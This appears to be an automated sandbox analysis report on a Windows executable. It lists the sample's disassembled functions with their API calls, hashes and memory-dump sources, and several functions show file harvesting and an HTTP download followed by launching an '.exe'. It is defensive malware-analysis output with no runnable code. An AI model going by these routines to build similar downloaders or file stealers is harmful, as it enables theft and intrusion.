API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
String ID:
API String ID: 2224742867-0
Opcode ID: 3a7e2721cf4788a98e0a0daef3f5d12efd7204c8e12c01b72c637950db721b6d
Instruction ID: 86fbade375af92132a986fa9c5747d5475b8d7537ae5cb7dcfb52aea8e3e4689
Opcode Fuzzy Hash: 3a7e2721cf4788a98e0a0daef3f5d12efd7204c8e12c01b72c637950db721b6d
Instruction Fuzzy Hash: 9C311C72A0121CAFDB209F64DC859EEB7BCEF0A344F0444A6F90AE2550D6359F85DF62

Function 00D683AE Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D63A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00D63A59

lstrcatA.KERNEL32(?,00000000), ref: 00D683F6
lstrcatA.KERNEL32(?,00D87B8C), ref: 00D68413
lstrcatA.KERNEL32(?), ref: 00D68426
lstrcatA.KERNEL32(?,00D87B90), ref: 00D68438

Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67D67
Part of subcall function 00D67D20: FindFirstFileA.KERNEL32(?,?), ref: 00D67D7E
Part of subcall function 00D67D20: StrCmpCA.SHLWAPI(?,00D87AF4), ref: 00D67D9F
Part of subcall function 00D67D20: StrCmpCA.SHLWAPI(?,00D87AF8), ref: 00D67DB9
Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67DE0
Part of subcall function 00D67D20: StrCmpCA.SHLWAPI(?,00D876B6), ref: 00D67DF4
Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67E11
Part of subcall function 00D67D20: PathMatchSpecA.SHLWAPI(?,?), ref: 00D67E3E
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?), ref: 00D67E74
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,00D87B10), ref: 00D67E86
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,?), ref: 00D67E99
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,00D87B14), ref: 00D67EAB
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,?), ref: 00D67EBF

Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67E28
Part of subcall function 00D67D20: CopyFileA.KERNEL32(?,?,00000001), ref: 00D67F78
Part of subcall function 00D67D20: DeleteFileA.KERNEL32(?), ref: 00D67FEC
Part of subcall function 00D67D20: FindNextFileA.KERNEL32(?,?), ref: 00D6804E
Part of subcall function 00D67D20: FindClose.KERNEL32(?), ref: 00D68062

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 19262a304674c3a424344e633807de0785daf09b9abb6f7f2cd65cfd28cdc5eb
Instruction ID: fd48a23bad523712d0cc0e776d08c391895e5883424f9b45e90fc7d4ac730f2b
Opcode Fuzzy Hash: 19262a304674c3a424344e633807de0785daf09b9abb6f7f2cd65cfd28cdc5eb
Instruction Fuzzy Hash: 6B21907990411CAFCF50EB60DC46ADCB7B9FF04305F0044A2AA84A3251EBB19AD99FB0

Function 00D6291C Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,00D8761F,?,?,?), ref: 00D62934
HeapAlloc.KERNEL32(00000000), ref: 00D6293B
GetLocalTime.KERNEL32(?), ref: 00D62947
wsprintfA.USER32 ref: 00D62972

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 4de1b3a084a5dbd186a73e07e7969ef472c194e55a8382a94e50fee12d59a3f0
Instruction ID: 27f7ace0d5a71a2fd2f188358e0c214e1a9b2b30544409974a65e3d8687176a5
Opcode Fuzzy Hash: 4de1b3a084a5dbd186a73e07e7969ef472c194e55a8382a94e50fee12d59a3f0
Instruction Fuzzy Hash: 78F0ECB690122CBBDB509BE99C09ABF77BCBF0C751F000056FA45E2190D6788A90E7B1

Function 00D63DFD Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00D66CE9,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00D66CE9,?), ref: 00D63E18
GetFileSizeEx.KERNEL32(00000000,00D66CE9,?,?,?,00D66CE9,?), ref: 00D63E30
CloseHandle.KERNEL32(00000000,?,?,?,00D66CE9,?), ref: 00D63E3B
CloseHandle.KERNEL32(00000000,?,?,?,00D66CE9,?), ref: 00D63E43

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 89cbd7e9046826bb6a6dc80bfbce2887841df59e9c18470783caad48cb1e235c
Instruction ID: 66bba4d4b91cd00b033863790c33e9bb1f4e7b3edf4b7def6c184f6e413a3c19
Opcode Fuzzy Hash: 89cbd7e9046826bb6a6dc80bfbce2887841df59e9c18470783caad48cb1e235c
Instruction Fuzzy Hash: 41F0A731A41218FBE7609760DC09F9A7A6DFB08750F104311FE51A21E5E771AB11D670

Function 00D64841 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D5515F: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D551A6
Part of subcall function 00D5515F: RtlAllocateHeap.NTDLL(00000000), ref: 00D551AD
Part of subcall function 00D5515F: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00D551CF
Part of subcall function 00D5515F: StrCmpCA.SHLWAPI(?), ref: 00D551E9
Part of subcall function 00D5515F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D55219
Part of subcall function 00D5515F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00D55258
Part of subcall function 00D5515F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00D55288
Part of subcall function 00D5515F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D55293

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D6428C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00D667CA), ref: 00D642A6

_memset.LIBCMT ref: 00D64930
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000020,00000000,00000000,?,?,00D87750), ref: 00D64984

Strings

.exe, xrefs: 00D6488D

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
String ID: .exe
API String ID: 2831197775-4119554291
Opcode ID: 5a70b10333bc27bbaefbee9b59eac27321ab93d9f7171b9b13ebdd9325eb5eaa
Instruction ID: 1bfc1238383a5c7f6438dfd68fddd0f775090ad9ee3724ae111993af6fcfd0ae
Opcode Fuzzy Hash: 5a70b10333bc27bbaefbee9b59eac27321ab93d9f7171b9b13ebdd9325eb5eaa
Instruction Fuzzy Hash: 3A410C32E40618ABDF10FBA5DC439EE7778EF49344F510061FE44B7152DA71AE4A8AB1

Function 00D60D50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00D60D57
std::_Xinvalid_argument.LIBCPMT ref: 00D60D7D

Part of subcall function 00D80478: std::exception::exception.LIBCMT ref: 00D8048D
Part of subcall function 00D80478: __CxxThrowException@8.LIBCMT ref: 00D804A2
Part of subcall function 00D80478: std::exception::exception.LIBCMT ref: 00D804B3

Part of subcall function 00D60927: malloc.MSVCRT ref: 00D60936
Part of subcall function 00D60927: __CxxThrowException@8.LIBCMT ref: 00D60951

Strings

vector<T> too long, xrefs: 00D60D78

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$H_prolog3_catchXinvalid_argumentmallocstd::_
String ID: vector<T> too long
API String ID: 285619538-3788999226
Opcode ID: d912ba47f224e28ec128ed09a1a2fa96c8ce7f31472b87971048ff3a16252398
Instruction ID: a5b478c35d5cd8a5c8e8d4b3c71112c7580fc1fecf1545e935d5ad1e715237d4
Opcode Fuzzy Hash: d912ba47f224e28ec128ed09a1a2fa96c8ce7f31472b87971048ff3a16252398
Instruction Fuzzy Hash: D7316B71A0060A9FCB15EF68C9419AFBFF6FF98310B248929F555A7251DB31E901CB70

Function 00D5FF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00D5FFAE
_memmove.LIBCMT ref: 00D5FFDD

Strings

string too long, xrefs: 00D5FFA9

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: c959d664a0709cf12cf77baf8092ac85ee3cbffa70905b82048b7c70469f318f
Instruction ID: ea65a0f6afc0d8c1980d17eabddd819c366a4391ea7a65fe13feb928781dd950
Opcode Fuzzy Hash: c959d664a0709cf12cf77baf8092ac85ee3cbffa70905b82048b7c70469f318f
Instruction Fuzzy Hash: 74115E313007509BDE309F6C9941A26B7E4DF42756B240A3DFD928FA82C761D84C87B1

Function 00D63B2B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00D63B55

Strings

image/jpeg, xrefs: 00D63B7D

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: malloc
String ID: image/jpeg
API String ID: 2803490479-3785015651
Opcode ID: 4945023c8be282b4adde38ae8de85c7d4ffea4cb91865eaacb2bd852da2640b6
Instruction ID: 992564d3430ba3eed1e9e346900d21fb079fd26426cf2daf101c30329ed405c6
Opcode Fuzzy Hash: 4945023c8be282b4adde38ae8de85c7d4ffea4cb91865eaacb2bd852da2640b6
Instruction Fuzzy Hash: 21116572D10208FFCB119FA9DC8589EBF79EE41361B25026AF915A31D0D7719F44DA60

Function 00D60532 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00D6054B

Part of subcall function 00D804C5: std::exception::exception.LIBCMT ref: 00D804DA
Part of subcall function 00D804C5: __CxxThrowException@8.LIBCMT ref: 00D804EF
Part of subcall function 00D804C5: std::exception::exception.LIBCMT ref: 00D80500

Part of subcall function 00D603BC: std::_Xinvalid_argument.LIBCPMT ref: 00D603CC

_memmove.LIBCMT ref: 00D6059D

Strings

invalid string position, xrefs: 00D60546

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 4a834413307f2ccb547fbb9469bdb3d293479dfbee8124fa6134b369a9daa36f
Instruction ID: 415a4f7d4dcd770e17b4a6df1ac238e8e93185a12d217188484353d76ba403c1
Opcode Fuzzy Hash: 4a834413307f2ccb547fbb9469bdb3d293479dfbee8124fa6134b369a9daa36f
Instruction Fuzzy Hash: 4211A131300310ABDB24AE2CD88195B7BF5EB14755B140929F957CB242D7B1ED408FB5

Function 00D60775 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00D60784

Part of subcall function 00D804C5: std::exception::exception.LIBCMT ref: 00D804DA
Part of subcall function 00D804C5: __CxxThrowException@8.LIBCMT ref: 00D804EF
Part of subcall function 00D804C5: std::exception::exception.LIBCMT ref: 00D80500

memmove.MSVCRT(00D5FF2F,00D5FF2F,C6C68B00,C6C68B00,00D5FF2F,00D6056A,?,00D5FF2F,?,?,00D605EC,?,?,?,-00000001,?), ref: 00D607BA

Strings

invalid string position, xrefs: 00D6077F

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: 007612d9d77c0f20ec4fd9d156f24925bd5f9200a8475332792905d608dcc41b
Instruction ID: eaef43951fd91d73533a475a07323832e7b93dd284244b1a6fb3a97b42799535
Opcode Fuzzy Hash: 007612d9d77c0f20ec4fd9d156f24925bd5f9200a8475332792905d608dcc41b
Instruction Fuzzy Hash: 050146393102018BD7248E6C89C492BBAEAEBC4711324093CD4C2C7685DBB0F84A9BB4

Function 00D70C39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 00D70C6E
DName::DName.LIBCMT ref: 00D70C7A

Strings

{flat}, xrefs: 00D70C69

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: 9a7df8da59cd1b6c85ec88631b90f89b0cd4e225c23c9d133e87b291e56d8bdf
Instruction ID: 368c6cfb2843d1d3011c3d0049bd175a79d557834e8af05435e543c5870e88f0
Opcode Fuzzy Hash: 9a7df8da59cd1b6c85ec88631b90f89b0cd4e225c23c9d133e87b291e56d8bdf
Instruction Fuzzy Hash: 3BF01535140349EFCB11AB58D455AA43FA5EB45B91F08C085EA4C4F3A2D661E842CBB1

Function 00D5140E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D51426
GlobalMemoryStatusEx.KERNEL32(?), ref: 00D51439

Strings

@, xrefs: 00D51432

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
